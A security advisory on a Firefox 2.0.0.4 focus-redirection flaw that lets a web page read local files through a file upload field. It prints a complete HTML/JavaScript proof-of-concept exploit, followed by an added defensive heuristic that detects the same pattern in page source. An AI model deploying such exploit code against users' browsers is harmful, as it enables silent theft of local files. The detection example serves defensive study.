A vulnerability in Mozilla Firefox allows an attacker to silently redirect the focus of selected key press events to an otherwise protected file upload form field. This is possible because of how the onKeyDown event is handled, which allows the focus to be moved between the two. This enables the attacker to read arbitrary files on the victim's system.
Credit:
The information has been provided by Carl Hardwick.
The original article can be found at: http://yathong.googlepages.com/FirefoxFocusBug.html
Vulnerable Systems:
* Mozilla Firefox version 2.0.0.4 and prior
Exploit:
<html>
<body>
<script>
function restore()
{
document.getElementById("text1").value=document.getElementById("file1").value;
document.getElementById("text1").focus();
}
function doKeyDown()
{
document.getElementById("label1").focus();
}
</script>
<input type="file" id="file1" name="file1" onkeydown="restore();" onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>
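
The focus handoff described above leaves a recognizable shape in page source: a key handler on one element that moves focus to a file upload field, or to a label bound to one. The following heuristic check for that shape is an added example, not part of the original advisory; the function names and the sample markup are constructed for illustration.

```javascript
// Heuristic static check, not a full HTML/JS parser: assumes double-quoted attributes and flat function bodies.
function attr(tag, name) {
  const m = new RegExp('\\s' + name + '\\s*=\\s*"([^"]*)"', 'i').exec(tag);
  return m ? m[1] : null;
}
function findFocusRedirects(html) {
  const tags = html.match(/<[a-z][^>]*>/gi) || [];
  // Focus targets that reach a file field: the field itself or a label bound to it.
  const targets = new Set();
  for (const t of tags) {
    const isFile = /^<input\b/i.test(t) && /^file$/i.test(attr(t, 'type') || '');
    if (isFile && attr(t, 'id')) targets.add(attr(t, 'id'));
  }
  for (const t of tags) {
    const isLabel = /^<label\b/i.test(t) && targets.has(attr(t, 'for'));
    if (isLabel && attr(t, 'id')) targets.add(attr(t, 'id'));
  }
  const focused = (code) => {
    const re = /getElementById\(\s*["']([^"']+)["']\s*\)\s*\.focus\s*\(/g;
    for (let m; (m = re.exec(code)); ) if (targets.has(m[1])) return m[1];
    return null;
  };
  // Script functions whose body focuses one of the targets.
  const funcs = new Map();
  const fnRe = /function\s+(\w+)\s*\([^)]*\)\s*\{([^}]*)\}/g;
  for (let m; (m = fnRe.exec(html)); ) {
    if (focused(m[2])) funcs.set(m[1], focused(m[2]));
  }
  // Key handlers on other elements that move focus to a target, inline or via a function.
  const findings = [];
  for (const t of tags) {
    if (targets.has(attr(t, 'id'))) continue;
    for (const event of ['onkeydown', 'onkeypress', 'onkeyup']) {
      const handler = attr(t, event);
      if (!handler) continue;
      const called = (handler.match(/\w+(?=\s*\()/g) || []).find((f) => funcs.has(f));
      const focuses = focused(handler) || (called ? funcs.get(called) : null);
      if (focuses) findings.push({ element: attr(t, 'id'), event, focuses });
    }
  }
  return findings;
}
// Constructed sample page: typing in the textarea moves focus to a label bound to the file field.
const SAMPLE = `
<script>function hop() { document.getElementById("lbl").focus(); }</script>
<input type="file" id="upload" name="upload" />
<label for="upload" id="lbl"></label>
<textarea id="note" onkeydown="hop()"></textarea>`;
console.log(findFocusRedirects(SAMPLE));
```

A hit is a prompt for manual review, not proof of abuse; handlers attached from script rather than through attributes are outside what this check sees.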